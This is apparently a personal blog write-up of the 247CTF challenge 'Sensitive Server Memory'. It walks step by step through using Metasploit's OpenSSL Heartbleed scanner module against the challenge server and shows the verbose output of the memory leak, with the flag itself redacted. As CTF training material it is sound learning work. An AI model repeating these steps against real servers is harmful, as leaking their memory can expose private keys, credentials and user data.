Sensitive Server Memory (misc)

PUBLISHED ON 16/02/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC

Intro

This is my write-up of a Misc challenge Sensitive Server Memory on the CTF site 247CTF.com.

Instructions

The webserver for this challenge is storing sensitive data in memory. Can you read it? Did anybody patch since 2014?

Howto

The greatest bug of 2014 was Heartbleed, so lets start with that.

Spin up your Kali Linux and enter Metasploit.

kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
msf5 >

Search the exploit database for anything heartbleed related:

msf5 > search heartbleed

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   1  auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

Select the auxiliary/scanner/ssl/openssl_heartbleed:

msf5 > use 0

Check which options need to be set:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

Set rhosts to domain provided by challenge:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 202f6701de93bfbe.247ctf.com
rhosts => 202f6701de93bfbe.247ctf.com

Set rport to the port provided by challeng:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 50071
rport => 50071

We need verbose set to true, so we can see the data that is leaking:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true

Run the exploit:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 144.76.74.118:50071   - Leaking heartbeat response #1
[*] 144.76.74.118:50071   - Sending Client Hello...
[*] 144.76.74.118:50071   - SSL record #1:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  86
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 82
[*] 144.76.74.118:50071   - 		Type:   Server Hello (2)
[*] 144.76.74.118:50071   - 		Server Hello Version:           0x0301
[*] 144.76.74.118:50071   - 		Server Hello random data:       20fe119d01d3ac29d5c59761e743d5d48ca8acfd23060efbff11cea2b68c08f7
[*] 144.76.74.118:50071   - 		Server Hello Session ID length: 32
[*] 144.76.74.118:50071   - 		Server Hello Session ID:        44fa4cb2ca1d11afa085d439bd12e8f023e7155f5923c41bf93d8b9b3e64ed82
[*] 144.76.74.118:50071   - SSL record #2:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  821
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 817
[*] 144.76.74.118:50071   - 		Type:   Certificate Data (11)
[*] 144.76.74.118:50071   - 		Certificates length: 814
[*] 144.76.74.118:50071   - 		Data length: 817
[*] 144.76.74.118:50071   - 		Certificate #1:
[*] 144.76.74.118:50071   - 			Certificate #1: Length: 811
[*] 144.76.74.118:50071   - 			Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, issuer=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, serial=#<OpenSSL::BN:0x0000558d6e19f950>, not_before=2019-02-12 21:20:09 UTC, not_after=2069-01-30 21:20:09 UTC>
[*] 144.76.74.118:50071   - SSL record #3:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  331
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 327
[*] 144.76.74.118:50071   - 		Type:   Server Key Exchange (12)
[*] 144.76.74.118:50071   - SSL record #4:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  4
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 0
[*] 144.76.74.118:50071   - 		Type:   Server Hello Done (14)
[*] 144.76.74.118:50071   - Sending Heartbeat...
[*] 144.76.74.118:50071   - Heartbeat response, 65535 bytes
[+] 144.76.74.118:50071   - Heartbeat response with leak, 65535 bytes
[*] 144.76.74.118:50071   - Printable info leaked:
############## FLAG in the leaked data
[*] 202f6701de93bfbe.247ctf.com:50071 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) >

Bingo!

See Also